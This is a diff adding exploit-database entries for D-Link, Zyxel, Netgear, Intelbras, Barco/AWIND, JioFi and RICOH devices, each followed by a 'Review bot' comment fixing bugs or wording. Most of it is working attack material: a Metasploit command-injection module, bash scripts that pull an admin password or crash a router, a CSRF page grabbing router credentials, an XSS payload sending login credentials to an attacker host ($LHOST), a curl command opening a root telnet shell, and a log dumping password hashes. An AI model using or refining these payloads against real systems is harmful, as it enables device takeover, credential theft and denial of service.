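which is what a defender needs.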

exploits/hardware/remote/48274.rb Executable file

@ -0,0 +1,138 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'DLINK DWL-2600 Authenticated Remote Command Injection',
'Description' => %q{
Some DLINK Access Points are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin.
},
'Author' =>
[
'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
'Nick Starke' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-20499' ],
[ 'EDB', '46841' ]
],
'DisclosureDate' => 'May 15 2019',
'Privileged' => true,
'Platform' => %w{ linux unix },
'Payload' =>
{
'DisableNops' => true,
'BadChars' => "\x00"
},
'CmdStagerFlavor' => :wget,
'Targets' =>
[
[ 'CMD',
{
'Arch' => ARCH_CMD,
'Platform' => 'unix'
}
],
[ 'Linux mips Payload',
{
'Arch' => ARCH_MIPSLE,
'Platform' => 'linux'
}
],
],
'DefaultTarget' => 1
))
register_options(
[
OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
])
end
def execute_command(cmd, opts={})
bogus = Rex::Text.rand_text_alpha(rand(10))
post_data = Rex::MIME::Message.new
post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
post_data.add_part("; #{cmd} ;", nil, nil, "form-data; name=\"configServerip\"")
print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin.cgi'),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'cookie' => "sessionHTTP=#{@token};",
'data' => post_data.to_s,
'query' => 'action=config_restore'
})
unless res || res.code != 200
fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
end
rescue ::Rex::ConnectionError
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
return
end
def exploit
user = datastore['HttpUsername']
pass = datastore['HttpPassword']
rhost = datastore['RHOST']
rport = datastore['RPORT']
print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/admin.cgi'),
'method' => 'POST',
'vars_post' => {
'i_username' => user,
'i_password' => pass,
'login' => 'Logon'
}
})
unless res && res.code != 404
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
unless [200, 301, 302].include?(res.code)
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
end
print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
delstart = 'var cookieValue = "'
tokenoffset = res.body.index(delstart) + delstart.size
endoffset = res.body.index('";', tokenoffset)
@token = res.body[tokenoffset, endoffset - tokenoffset]
if @token.empty?
fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
end
print_good("#{peer} - Received Auth token: #{@token}")
if target.name =~ /CMD/
unless datastore['CMD']
fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
end
execute_command(payload.encoded)
else
execute_cmdstager(linemax: 100, noconcat: true)
end
end
end
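Review bot: the success check in `execute_command`, `unless res || res.code != 200`, is unreachable as written: when `res` is nil the right-hand side dereferences nil and raises `NoMethodError`, and when `res` is present the `||` is already true, so `fail_with(Failure::UnexpectedReply, ...)` never fires; the intended condition is `unless res && res.code == 200`. Two smaller points: `bogus = Rex::Text.rand_text_alpha(rand(10))` yields an empty string whenever `rand(10)` returns 0 (use `rand(1..10)`), and the locals `rhost = datastore['RHOST']` / `rport = datastore['RPORT']` in `exploit` shadow the framework's `rhost`/`rport` helpers that `execute_command` already uses, so the two methods should use the same source for consistency.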


@ -4,7 +4,7 @@
# Tested on: Windows 10 x64
# CVE : CVE-2019-6710
# Author : Ali Can Gönüllü
# Twitter : @god3err
# Twitter : @alicangonullu
Exploits :
-->


@ -0,0 +1,33 @@
# Exploit Title: Reflected HTML Injection
# Google Dork: None
# Date: 16/12/2015
# Exploit Author: Ramikan
# Vendor Homepage:https://www.salicru.com/en/
# Software Link: N/A
# Version: Tested on SaLICru -SLC-20-cube3(5).
# Firmware: cs121-SNMP v4.54.82.130611
# CVE : CVE-2019-10887
# Category:Web Apps
Vulnerability: Reflected HTML Injection
Vendor Web site:
Version tested:cs121-SNMP v4.54.82.130611
Solution: N/A
Note:Default credential:admin/admin or admin/cs121-snmp
Victim need to be authenticated in order to get affected by this.
Vulnerability 1:Refelected HTML Injection
Affected URL:
/DataLog.csv?log=
/AlarmLog.csv?log=
/waitlog.cgi?name=
/chart.shtml?data=
/createlog.cgi?name=
Affected Parameter: log, name, data
Payload: <h1>HTML Injection</h1>
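Review bot: `Vendor Web site:` is left empty although the header already carries `# Vendor Homepage:https://www.salicru.com/en/`; fill it or drop the duplicate field. "Refelected" in `Vulnerability 1:Refelected HTML Injection` is a typo, and `# Date: 16/12/2015` precedes the CVE year (2019), so the discovery and disclosure dates should be given separately. `Solution: N/A` should at least restate the mitigating factor from the note (the victim must already be authenticated, and the listed defaults should be changed) and whether the vendor was notified, since that is what an operator reading the entry needs.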


@ -0,0 +1,16 @@
# Exploit Title: Multiple Stored and Reflected XSS vulnerabilities in D-Link DI-524
# Date: April 6, 2019
# Exploit Author: Semen Alexandrovich Lyhin (https://www.linkedin.com/in/semenlyhin/)
# Vendor Homepage: https://www.dlink.com
# Version: D-Link DI-524 - V2.06RU
# CVE : CVE-2019-11017
To re-create Reflected XSS vulnerability, log in to the Web Configuration (default credentials are: "admin":"" without double quotes), and send GET request to the router with malformed vulnerable parameter:
http://$IP/cgi-bin/smap?RC=@smap%22-$PAYLOAD-%22&rd=x&SEO=o&AC=O&SnO=1&SHO=2&StO=1&SpO=1&SPO=1
Where $IP may be equal to "192.168.0.1", $PAYLOAD may be equal to "alert(document.location)".
Stored XSS's were found in web forms on pages /spap.htm, /smap.htm. To inject malicious JavaScript to victim's webpage, an attacker should authorize on the router, then put a payload to any of the vulnerable forms, and wait, until victim opens router's web interface and goes to vulnerable page.
I haven't tested all the admin panel of the router, so I can guess that there are other XSS vulnerabilities in this router.
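Review bot: the advisory gives the request but never names the reflected parameter; the payload is placed in `RC` of `/cgi-bin/smap` (`RC=@smap%22-$PAYLOAD-%22`), and stating that explicitly lets defenders write a filter rule. The header lacks a `# Tested on:` line and no fix status is given for `V2.06RU`; the closing sentence about untested parts of the panel should be labelled as untested rather than implied vulnerable.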


@ -0,0 +1,80 @@
# Exploit Title: Reflected XSS on Zyxel login pages
# Date: 10 Apr 2019
# Exploit Author: Aaron Bishop
# Vendor Homepage: https://www.zyxel.com/us/en/
# Version: V4.31
# Tested on: ZyWall 310, ZyWall 110, USG1900, ATP500, USG40 - weblogin.cgi, webauth_relogin.cgi
# CVE : 2019-9955
1. Description
==============
Several Zyxel devices are vulnerable to a reflected Cross-Site Scripting via the
mp_idx parameter on weblogin.cgi and webauth_relogin.cgi.
2. Proof of Concept
=============
Host a malicious file JavaScript file named 'z', or any other single character,
locally. The contents of 'z' for the following example are:
-----
$("button").click(function() {
$.get("//$LHOST", { username: $("input:text").val(), password: $("input:password").val(), host: location.hostname});
});
-----
Close the mp_idx variable with "; and Use the getScript functionality of jQuery
to include the malicious file:
Request:
GET /?mobile=1&mp_idx=%22;$.getScript(%27//$LHOST/z%27);// HTTP/1.1
Host: $RHOST
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Date: Wed, 10 Apr 2019 23:13:39 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: Mon, 16 Apr 1973 13:10:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 7957
<!DOCTYPE html>
<html>
<head>
<title>Welcome</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta charset="utf-8">
<meta http-equiv="pragma" content="no-cache">
<link href="/ext-js/mobile/css/jquery.mobile-1.4.2.min.css?v=180711001117" rel="stylesheet" type="text/css">
<link href="/ext-js/mobile/css/style.css?v=180711001117" rel="stylesheet" type="text/css">
<link href="/ext-js/mobile/css/theme.css?v=180711001117" rel="stylesheet" type="text/css">
<link rel="stylesheet" type="text/css" href="/logo/mobile_custmiz_page.css?v=180711001117" />
<script src="/ext-js/mobile/js/jquery-1.8.2.min.js?v=180711001117" type="text/javascript"></script>
<script src="/ext-js/mobile/js/jquery.mobile-1.4.2.min.js?v=180711001117" type="text/javascript"></script>
<script type="text/javascript" src="/lang/language_panel.js?v=180711001117"></script>
<script language="JavaScript">
var errorNum = 0;
var mp_idx = "";$.getScript('//$LHOST/z');//";
...
When the login form is submitted, the host for the malicious file gets a request
containing the login credentials and target system:
$LHOST - - [10/Apr/2019 23:04:41] "GET /z?_=1554937481076 HTTP/1.1" 200 -
$LHOST - - [10/Apr/2019 23:04:49] "GET /?username=test&password=test&host=$RHOST HTTP/1.1" 200 -
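Review bot: `# CVE : 2019-9955` lacks the `CVE-` prefix, which breaks index lookup. The description should state that the value lands inside an inline script assignment (`var mp_idx = "";$.getScript('//$LHOST/z');//";`) rather than in HTML, since that is the context a filter or output-encoding fix must handle, and that the page already ships jQuery 1.8.2, which the PoC depends on. `# Version: V4.31` is given without a fixed firmware version; add it if known.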


@ -0,0 +1,63 @@
# Exploit Title: cgi-bin/qcmap_web_cgi on JioFi 4G M2S 1.0.2 devices has XSS and HTML injection via the mask POST parameter.
# Exploit Author: Vikas Chaudhary
# Date: 21-01-2019
# Vendor Homepage: https://www.jio.com/
# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
# Category: Hardware
# Contact: https://www.facebook.com/profile.php?id=100011287630308
# Web: https://gkaim.com/
# Tested on: Windows 10 X64- Firefox-65.0
# CVE-2019-7438
***********************************************************************
## Vulnerability Description => HTML injection is an attack that is similar to Cross-site Scripting (XSS). While in the XSS vulnerability the attacker can inject and execute Javascript code, the HTML injection attack only allows the injection of certain HTML tags. When an application does not properly handle user supplied data, an attacker can supply valid HTML code, typically via a parameter value, and inject their own content into the page. This attack is typically used in conjunction with some form of social engineering, as the attack is exploiting a code-based vulnerability and a user's trust.
----------------------------------------
# Proof Of ConceptoC
1- First Open BurpSuite
2- Make Intercept on
3 -Go to your Wifi Router's Gateway in Browser [i.e http://192.168.225.1 ]
4-Capture the data and then Spider the Host
5- Now You find a Link like like this [ http://192.168.225.1/cgi-bin/qcmap_web_cgi ]
6- Send it to repeter Now you will find parameter like this [ Page=GetWANInfo&mask=0&token=0 ]
7-Vulnerable parameter is => mash
8-Paste this PAYLOAD in mask parameter and then show Response in browser
Payload =>
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
9- You will see a fake Login page on the screen -
----------------------------------------------------------------------------------
Vulnerable URL => Post Based => http://192.168.225.1/cgi-bin/qcmap_web_cgi => mask parameter -
----------------------------------------------------------------------------------
REQUEST
-------------------
POST /cgi-bin/qcmap_web_cgi HTTP/1.1
Host: 192.168.225.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.225.1/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 550
Connection: close
Page=GetWANInfo&mask=<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>&token=0
****************************
RESPONSE
-----------------
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Frame-Options: SAMEORIGIN
connection: close
Content-Type: text/html
Content-Length: 1167
Date: Mon, 21 Jan 2019 18:02:07 GMT
Server: lighttpd/1.4.35
{"Page":"GetWANInfo","Mask":"<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:red; padding: 1em;"><h1><font color="white">Please login with valid credentials:- It's A Fake Login Page<br><form name="login" action="http://anysite.com/"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>","wan_status":"On","total_data_used":"10005648","wan_operation_mode":"NAT","wan_connection_mode":"DHCP","wan_mac":"40:C8:CB:07:2C:8A","host_name":"JMR1140-072C8A","multi_pdn":"Disabled","ipv4_addr":"10.153.220.101","ipv4_subnet":"255.255.255.252","ipv4_gateway":"10.153.220.102","ipv4_primary":"49.45.0.1","ipv4_secondary":"0.0.0.0","ipv6_addr":"2409:4060:218e:b511:89ec:3214:def1:f75b","ipv6_subnet":"64","ipv6_gateway":"fe80::c9b3:928a:5eca:7e1c","ipv6_primary":"2405:200:800::1","ipv6_secondary":"::","channel":"automatic","packet_loss":"0 / 0","total_data_used_dlink":"5.11 MB","total_data_used_ulink":"4.37 MB"}
---------------------------------------------------------------------------------------------------------------
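Review bot: step 7 says `Vulnerable parameter is => mash` while the title, the request and step 8 use `mask`; fix the typo ("Proof Of ConceptoC" is another). The captured response shows the root cause better than the generic definition in the description does: the device echoes the raw `mask` value into a JSON body served as `Content-Type: text/html`, so the fix is escaping plus a correct `application/json` content type, and the description should say so. The response also contains the reporter's live WAN data (`wan_mac`, `ipv4_addr`, `ipv6_addr`, `ipv4_gateway`, `host_name`); those should be redacted before publication.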


@ -0,0 +1,29 @@
#/bin/bash
# PoC based on CVE-2016-5649 created by Social Engineering Neo.
#
# Long Method: https://www.youtube.com/watch?v=f3awG0XPKAs
#
# https://www.shodan.io/search?query=DGN2200 = 2,325 possible vulnerable devices.
# https://www.shodan.io/search?query=DGND3700 = 555 possible vulnerable devices.
#
# A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication.
# When the request is processed, it exposes the administrator password in clear text before getting redirected to 'absw_vfysucc.cgia'.
# An attacker can use this password to gain administrator access of the targeted routers web interface.
#
# Netgear has released firmware version 1.0.0.52 for DGN2200 & 1.0.0.28 for DGND3700 to address this issue.
clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' $target:$port/BSW_cxttongr.htm)
pass=$(echo $grab | awk '{print $218}' | tail -c +2 | head -c -3)
if [ "$pass" == '' ] || [ "$pass" == '/html' ] ; then
echo Invalid Response, Target May Not be Vulnerable.
else
echo The Password for: $target is: $pass
fi
else
echo "Incorrect Port."
fi
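Review bot: the first line `#/bin/bash` is missing the `!`, so it is a comment rather than a shebang and the script runs under whatever shell invokes it. `$target`, `$port` and `$grab` are unquoted throughout, and `awk '{print $218}'` extracts the value by positional field, so any change in page layout silently yields an empty string and the script's own "Target May Not be Vulnerable" message becomes misleading; a non-numeric `$port` also makes `[ "$port" -lt 65536 ]` error out. The Shodan hit counts in the comment are a point-in-time snapshot and should be dated.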


@ -0,0 +1,36 @@
#/bin/bash
# PoC based on CVE-2019-11415 created by Social Engineering Neo.
#
# Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/
#
# A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.
#
# Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Target May be Offline or Blocking ICMP requests.
read -p "Would you Like to Proceed? (Y/n): " ans
if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
clear
exit
fi
fi
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
else
echo "Incorrect Port."
fi
clear
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate.
else
echo Exploit Unsuccessfull, Target May Not be Vulnerable.
fi
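Review bot: the first line `#/bin/bash` is missing the `!`, so it is an ordinary comment rather than a shebang and the script runs under whatever shell invokes it; it should read `#!/bin/bash`. The `else` branch that prints `Incorrect Port.` does not `exit`, so the script continues, the following `clear` wipes the message, and the second ping check then reports `Router Successfully Taken Offline` or `Exploit Unsuccessfull` although no request was ever sent; add `exit 1` after the message. `grep icmp*` should be quoted (`grep 'icmp'`), since the unquoted `icmp*` is a glob that expands if a matching file exists in the working directory, and "Unsuccessfull" is spelled with one `l`.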

View file

@ -0,0 +1,35 @@
<!--
PoC based on CVE-2019-11416 created by Social Engineering Neo.
Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-1-5-0-csrf-lead-to-router-takeover/
Due to inexistent authorization on router API on authenticated IP addresses, an attacker can use this weak spot to change router configurations and take the current administrator password.
Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
-->
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>IWR 3000N - CSRF on authenticated administrator</title>
</head>
<body>
<button onclick="exploit()">Exploit!</button>
<p>Click the button to get the login and password.</p>
<script>
function exploit(){
$.get( "http://localhost:80/v1/system/user" )
.done(( data ) => {
alert( data );
})
.fail(function( err, status) {
alert( status );
});
}
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
</body>
</html>
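Review bot: the inline script uses `$` but the jQuery `<script src="https://ajax.googleapis.com/...">` tag is placed after it at the end of `<body>`; this only works because `exploit()` is not invoked until the button is clicked, and the include should be moved above the inline script (or into `<head>`) so the dependency is explicit. The request target `http://localhost:80/v1/system/user` is a placeholder that the header comment does not document: in the viewer's browser `localhost` is the viewer's own machine, not the router, so say what the address stands for and that it must be adjusted to the test setup. The file also lacks the `# Exploit Title / Date / Exploit Author` header that the other entries in this commit carry, so the title, date and CVE (CVE-2019-11416, currently only inside the HTML comment) are not machine-readable.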

View file

@ -0,0 +1,40 @@
##
# Exploit Title: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection
# Date: 05/01/2019
# Exploit Author: Jacob Baines
# Tested on: Crestron AM-100 1.6.0.2
# CVE : CVE-2019-3929
# PoC Video: https://www.youtube.com/watch?v=q-PIjnPcu2k
# Advisory: https://www.tenable.com/security/research/tra-2019-20
# Writeup: https://medium.com/tenable-techblog/eight-devices-one-exploit-f5fc28c70a7c
# Affected Vendors/Device/Firmware:
# - Crestron AM-100 1.6.0.2
# - Crestron AM-101 2.7.0.1
# - Barco wePresent WiPG-1000P 2.3.0.10
# - Barco wePresent WiPG-1600W before 2.4.1.19
# - Extron ShareLink 200/250 2.0.3.4
# - Teq AV IT WIPS710 1.1.0.7
# - InFocus LiteShow3 1.0.16
# - InFocus LiteShow4 2.0.0.7
# - Optoma WPS-Pro 1.0.0.5
# - Blackbox HD WPS 1.0.0.5
# - SHARP PN-L703WA 1.4.2.3
##
The following curl command executes the commands "/usr/sbin/telnetd -p 1271 -l /bin/sh" and "whoami" on the target device:
curl --header "Content-Type: application/x-www-form-urlencoded" \
--request POST \
--data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" \
--insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
Example:
albinolobster@ubuntu:~$ curl --header "Content-Type: application/x-www-form-urlencoded" --request POST --data "file_transfer=new&dir='Pa_Note/usr/sbin/telnetd -p 1271 -l /bin/shPa_Note'whoami" --insecure https://192.168.88.250/cgi-bin/file_transfer.cgi
root
albinolobster@ubuntu:~$ telnet 192.168.88.250 1271
Trying 192.168.88.250...
Connected to 192.168.88.250.
Escape character is '^]'.
~/boa/cgi-bin #
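Review bot: the `Affected Vendors/Device/Firmware` list in the header mixes exact firmware builds (`Crestron AM-100 1.6.0.2`) with a range (`Barco wePresent WiPG-1600W before 2.4.1.19`) without saying whether the exact versions are the only affected builds or simply the ones tested; since the Tenable advisory TRA-2019-20 is linked, state the fixed versions where known so readers can check their own firmware. `Date: 05/01/2019` is ambiguous (1 May or 5 January); the other entries in this commit use ISO `YYYY-MM-DD`. The example session embeds the lab address `192.168.88.250` without marking it as a placeholder.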

View file

@ -0,0 +1,42 @@
# Exploit Title: RICOH SP 4510DN Printer - HTML Injection
# Date: 2019-05-06
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
# Software: RICOH Printer
# Product Version: SP 4510DN
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection
# CVE: CVE-2019-11845
# An HTML Injection vulnerability has been discovered on the RICOH SP 4510DN via the /web/entry/en/address/adrsSetUserWizard.cgi entryNameIn parameter.
# HTTP POST Request :
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 102
DNT: 1
Connection: close
Cookie: risessionid=071652497206133; cookieOnOffChecker=on; wimsesid=98044857
mode=ADDUSER&step=BASE&wimToken=958429369&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E
# HTTP Response :
HTTP/1.1 200 OK
Date: Mon, 06 May 2019 11:42:46 GMT
Server: Web-Server/3.0
Content-Type: text/plain
Expires: Mon, 06 May 2019 11:42:46 GMT
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
[14]
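Review bot: the header keys `Vulernability Type` and `Vulenrability` are misspelled (`Vulnerability Type` / `Vulnerability`), and the `Hardware Link` for the SP 4510DN points at the `sp-4520dn.html` product page, i.e. the sibling advisory's model. The response shown ends at `[14]` and only confirms that the POST was accepted; the advisory would be stronger with the address-list page where `entryNameIn` is rendered back, since that is where the injected `<h1>` actually appears. The `risessionid`, `wimsesid` and `wimToken` values from the test session could be redacted.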

View file

@ -0,0 +1,43 @@
# Exploit Title: RICOH SP 4520DN Printer - HTML Injection
# Date: 2019-05-06
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/single-function-printers/sp-4520dn.html
# Software: RICOH Printer
# Product Version: SP 4520DN
# Vulernability Type: Code Injection
# Vulenrability: HTML Injection
# CVE: CVE-2019-11844
# An HTML Injection vulnerability has been discovered on the RICOH SP 4520DN via the /web/entry/en/address/adrsSetUserWizard.cgi
# entryNameIn or entryDisplayNameIn parameter.
# HTTP POST Request :
POST /web/entry/en/address/adrsSetUserWizard.cgi HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://TARGET/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 219
DNT: 1
Connection: close
Cookie: risessionid=110508462500758; cookieOnOffChecker=on; wimsesid=598742008
mode=ADDUSER&step=BASE&wimToken=279565363&entryIndexIn=00001&entryNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryDisplayNameIn=%22%3E%3Ch1%3ETEST%3C%2Fh1%3E&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1
# HTTP Response :
HTTP/1.1 200 OK
Date: Mon, 06 May 2019 11:00:09 GMT
Server: Web-Server/3.0
Content-Type: text/plain
Expires: Mon, 06 May 2019 11:00:09 GMT
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
[14]
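Review bot: the same header typos as the SP 4510DN entry (`Vulernability Type`, `Vulenrability`) recur here, and `Vulnerability Type: Code Injection` disagrees with the HTML-injection finding described one line below; use one classification. The `[14]` response body does not show the rendered result for either `entryNameIn` or `entryDisplayNameIn`; include the page where the stored value is displayed so the injection is demonstrated rather than asserted.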

View file

@ -0,0 +1,356 @@
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Restore Configuration)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
CVE: CVE-2019-20499
CVE: CVE-2019-20500
CVE: CVE-2019-20501
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=config_restore
Vulnerable POST Form Data Parameter:
[+] configRestore
[+] configServerip
===========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
[+] WLAN-EAP
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by local authenticated attackers.
there is no input validation on the POST Form Data Parameter "configRestore"
and the Form Data Parameter "configServerip" (the input are passed directly to TFTP command) which allow attackers to execute arbitrary Operating System Commands on the device for malicious purposes.
The attacker has to know the credentials in order to access the Panel .
For security demonstration or to reproduce the vulnerability follow the provided information in the attachement provided Screenshot2.jpg .
--- PoC Session Logs ---
POST /admin.cgi?action=config_restore HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 357
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
User-Agent: Xxxxxxxx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost/admin.cgi?action=config_restore
Accept-Encoding: gzip, deflate
Accept-Language: fr-FR,fr;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: sessionHTTP=UQAafLpviZXbWDQpJAnrNmEJoFQIBAcX; clickedFolderFrameless=43%5E
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="optprotocol"
up
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configRestore"
;whoami;
------WebKitFormBoundary4ZAwHsdySFjwNXxE
Content-Disposition: form-data; name="configServerip"
;cat /var/passwd;cat /var/passwd
------WebKitFormBoundary4ZAwHsdySFjwNXxE--
----------->Response----------->
HTTP/1.0 200 OK
Content-Type: text/html; charset=UTF-8
/usr/bin/tftp: option requires an argument -- r
BusyBox v1.18.2 (2018-02-26 11:53:37 IST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-b SIZE Transfer blocks of SIZE octets
sh: whoami: not found
sh: whoami: not found
root:$1$XDXDXDXD$JTedJSDYDA.pFjIToxlGA1:0:0:root:/root:/bin/sh
admin:2yn.4fvaTgedM:0:0:cisco:/root:/bin/splash
nobody:x:99:99:nobody:/:/bin/false
Note : for testing put the values in the fields like this :
;command1;same_command1;command2;command2
----+Discovered By Raki Ben Hamouda----+
Document Title:
===============
D-Link DWL-2600AP - (Authenticated) OS Command Injection (Save Configuration)
Product & Service Introduction:
===============================
The D-Link DWL-2600AP has a web interface for configuration. You can use any web browser you like to login to the D-Link DWL-2600AP.
Affected Product(s):
====================
Product: D-Link DWL-2600AP (Web Interface)
Exploitation Technique:
=======================
Local
Severity Level:
===============
HIGH
Base Score (CVSS):
===============
7.8
===============
Request Method(s):
[+] POST
URL Path :
[+] /admin.cgi?action=config_save
Vulnerable POST Form Data Parameter:
[+] configBackup
[+] downloadServerip
==========================
Device Firmware version :
[+] 4.2.0.15
Hardware Version :
[+] A1
Device name :
[+] D-Link AP
Product Identifier :
